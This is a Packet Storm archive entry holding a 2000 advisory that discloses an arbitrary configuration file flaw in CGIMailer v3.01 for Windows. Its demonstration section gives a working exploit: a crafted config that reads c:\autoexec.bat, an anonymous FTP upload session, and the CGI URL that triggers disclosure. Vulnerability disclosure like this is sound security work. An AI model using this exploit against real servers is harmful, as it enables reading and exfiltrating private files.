cgimail.txt

2000-04-20T00:00:00
ID PACKETSTORM:10046
Type packetstorm
Reporter Chopsui-cide
Modified 2000-04-20T00:00:00

Description

                                        
                                            `Advisory: CGIMailer v3.01 for Windows 95/98/2000/NT4.0  
Chopsui-cide[MmM]  
The Mad Midget Mafia - http://midgets.box.sk/  
=======================================================================  
  
Summary:  
==========  
Date released: 15/03/2000 (dd/mm/yyyy).  
Risk: reading of private files.  
Vulnerability found by: Chopsui-cide.  
Vulnerable: CGIMailer v3.01, probably prior versions (not tested).  
Immune: ?  
  
CGIMailer makes use of configuration files which specify certain  
variables (address to post to, etc). An attacker can specify his/her  
own configuration file.  
  
Details:  
==========  
Anyone who can execute CGIMailer (anyone who can use the forms that use  
CGIMailer) can specify what configuration file to use and this can  
be any file on the system CGIMailer is running on. This allows for the  
existance of private files to be detected.  
There are more dangerous implications though: this vulnerability could  
possibly be exploited to obtain private files from the target system.  
If there is an FTP server running on the target system on which an  
attacker has upload priviledges, he/she could upload a malicious  
configuration file, and then run it using CGIMailer. Configuration  
files can be used to send files to the attacker via e-mail (among  
other things).  
  
Implementation:  
=================  
To demonstrate this problem, I set up Xitami Webserver + Serv-U FTP 2.5d.  
The target host is therocksays.  
  
We have anonymous FTP access in Serv-U FTP with upload priviledges to  
the incoming directory, and Xitami will allow us to execute CGI  
scripts. This is all we will need to execute the attack.  
  
Here is the configuration file that will send us the contents of  
autoexec.bat:  
  
GATEWAY=notneeded.com  
PORT=25  
FROM=nobody@isp.com  
TO=nobody@isp.com  
SUBJECT=CGIMailer form  
RESPONSE_TEMPLATE=c:\autoexec.bat  
REFBASE_ALLOW=  
  
Now to upload it...  
  
D:\>ftp therocksays  
Connected to therocksays.  
220 Serv-U FTP-Server v2.5d for WinSock ready...  
User (therocksays:(none)): anonymous  
331 User name okay, please send complete E-mail address as password.  
Password:  
230 User logged in, proceed.  
ftp> dir  
200 PORT Command successful.  
150 Opening ASCII mode data connection for /bin/ls.  
drwxrwxrwx 1 user group 0 Mar 15 06:28 incoming  
226 Transfer complete.  
65 bytes received in 0.00 seconds (65000.00 Kbytes/sec)  
ftp> cd incoming  
250 Directory changed to /d:/ftproot/incoming  
ftp> put test.cf  
200 PORT Command successful.  
150 Opening ASCII mode data connection for test.cf.  
226 Transfer complete.  
150 bytes sent in 0.06 seconds (2.50 Kbytes/sec)  
ftp> pwd  
257 "/d:/ftproot/incoming" is current directory.  
ftp>  
  
Serv-U was even kind enough to give us the local path of the config  
file. Now all we need to do is point our browser at:  
http://therocksays/cgi-bin/cgimail?d:\ftproot\incoming\test.cf  
  
The contents of autoexec.bat should be listed at the top of the  
resulting HTML file. This could have been e-mailed as an attachment  
to any address we wanted.  
  
=======================================================================  
`